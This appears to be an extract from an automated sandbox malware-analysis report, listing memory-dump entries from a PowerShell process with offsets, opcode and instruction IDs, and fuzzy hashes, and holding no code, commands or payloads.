                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da753218b1bdd618612afb0971a1e3023b50b03186eae884fdf439f722b89c9d
                                  • Instruction ID: 492571a42f30eb60b47eb69d5459fcf18ddf7a59405ee29dd1dfb96eb64425b7
                                  • Opcode Fuzzy Hash: da753218b1bdd618612afb0971a1e3023b50b03186eae884fdf439f722b89c9d
                                  • Instruction Fuzzy Hash: 01B15F71E00209DFDF10CFA8E98579EBBF1BF88314F148529E816A7254EB74A846DF91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be0a5c568db3ebb5d182e60f8e030335fef269c42df57a5dd7d45c57f39eddc4
                                  • Instruction ID: 2a6f18e2e4cb5ec96cd449307bf3bdd63ef24724d9df75920605b85c588dab8d
                                  • Opcode Fuzzy Hash: be0a5c568db3ebb5d182e60f8e030335fef269c42df57a5dd7d45c57f39eddc4
                                  • Instruction Fuzzy Hash: D8B16072E00209DFDB10CFA8E9817DDBBF1BF48718F148529D41AE7254EB74A885DB91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02f3bbcdb54aafe357d6b26ce5b115893f004166e0ca86cba072e3d4522761be
                                  • Instruction ID: 357c6839515b8bf7fe0a6ad1531046838d71e9f29c5a1418ad81a4165e89a406
                                  • Opcode Fuzzy Hash: 02f3bbcdb54aafe357d6b26ce5b115893f004166e0ca86cba072e3d4522761be
                                  • Instruction Fuzzy Hash: D591D2B0B212049FD754EB58C955BAE7BE6EF88304F50C864E900AF395CB76EC54CB91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32c5ffc2cbd183f2f624e08f363b39d984f460c5d5c651361bf2262072b48d74
                                  • Instruction ID: 173e0259dd15498955e4c3254475b57ba8aba54691d2c73c34495a79f381bdc0
                                  • Opcode Fuzzy Hash: 32c5ffc2cbd183f2f624e08f363b39d984f460c5d5c651361bf2262072b48d74
                                  • Instruction Fuzzy Hash: B791B0B0A212059FD754EF64C945BAABBF2EF88308F11C865E500AF395CB76EC54CB91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3389bfac6066b07ca2fd0cbb2d6561d29311d6e87b7ec309cf0f094098dac4aa
                                  • Instruction ID: ff269085738c0b3e46b16f91a639084ce469c11a23c0e8288d55c74a19d53d34
                                  • Opcode Fuzzy Hash: 3389bfac6066b07ca2fd0cbb2d6561d29311d6e87b7ec309cf0f094098dac4aa
                                  • Instruction Fuzzy Hash: 57718E30A06244DFCB15DF64D4849ADBBF6FF89314F1884A9E406AB362CB35ED85DB50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a5aa667797b6114ada6d62c0134d945cd4678b89ecaa91ade1343f2eeb0fb50
                                  • Instruction ID: dfd8d7b112a1dcf8501a8c31ec92fafd603a2ba2a9d90660aa1384a184d867cc
                                  • Opcode Fuzzy Hash: 4a5aa667797b6114ada6d62c0134d945cd4678b89ecaa91ade1343f2eeb0fb50
                                  • Instruction Fuzzy Hash: 9371AF70A002499FCB15DF68D880AAEBBF6FF85314F14856AE416DB391DB75EC46CB80
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ad6fc639db4737da202e69bc76f667af9955c26bc63d2a3365a1291b984f2e1
                                  • Instruction ID: 34b040b0578626733a2f1a8ccdf7dc9793088f36962d7275def80e89f94e5a2c
                                  • Opcode Fuzzy Hash: 5ad6fc639db4737da202e69bc76f667af9955c26bc63d2a3365a1291b984f2e1
                                  • Instruction Fuzzy Hash: 65716B72E00249DFDF10CFA8E84179EBBF2BF88314F148529D416A7254EB74A842DF95
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 843b4dd6f74dacda9897776938f37f8034d3f4fafe957c77ca245afad4071592
                                  • Instruction ID: 6f4108c4ac907d830b6b1eeac95f9234068d9331f225eb7a7e34fc0b1df9e22c
                                  • Opcode Fuzzy Hash: 843b4dd6f74dacda9897776938f37f8034d3f4fafe957c77ca245afad4071592
                                  • Instruction Fuzzy Hash: 94713A70A002089FDB18DFA8D584BADBBF6BF88314F148469E416AB360DB35AD46CB40
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32d2ca840ee1e087db4a4f4ef1f09b1d78034c7636f0e061fe6782cf4ffee9a8
                                  • Instruction ID: 022563112e8d6a13331b7d7b44ae459951ad353a4718d5292a7f036c482bc657
                                  • Opcode Fuzzy Hash: 32d2ca840ee1e087db4a4f4ef1f09b1d78034c7636f0e061fe6782cf4ffee9a8
                                  • Instruction Fuzzy Hash: F0716E71E00209DFDF10CFA9E88179EBBF2BF88714F148529E416A7254EB74A842DF95
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ea5a4ac039ea7d449f3b094a01c21ba2384f34e11daccf22ed86b1a605b5db0
                                  • Instruction ID: ef159fe355ed5c260de59ae054ffc6d4892287c6a1d5ec88eb08da07dccf6ea0
                                  • Opcode Fuzzy Hash: 5ea5a4ac039ea7d449f3b094a01c21ba2384f34e11daccf22ed86b1a605b5db0
                                  • Instruction Fuzzy Hash: EF417971A002408FDB189F28D958AADBBF6FF8D750F085469E407EB7A1CB38AC41DB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-2004741541
                                  • Opcode ID: 02b7a727b338edbca524b219ab20fc5b14c18372ae13ba4c8699d836e7745b33
                                  • Instruction ID: da2aad0cea931f2b0d94d4299ed856c6dffbb33af3cd9e736f725a1fbc3950d3
                                  • Opcode Fuzzy Hash: 02b7a727b338edbca524b219ab20fc5b14c18372ae13ba4c8699d836e7745b33
                                  • Instruction Fuzzy Hash: 86C1F7B172520BCFCB54AF28C4006AA77A5EF85320F14C5BAD8558B2D1DB36C9C5C7B1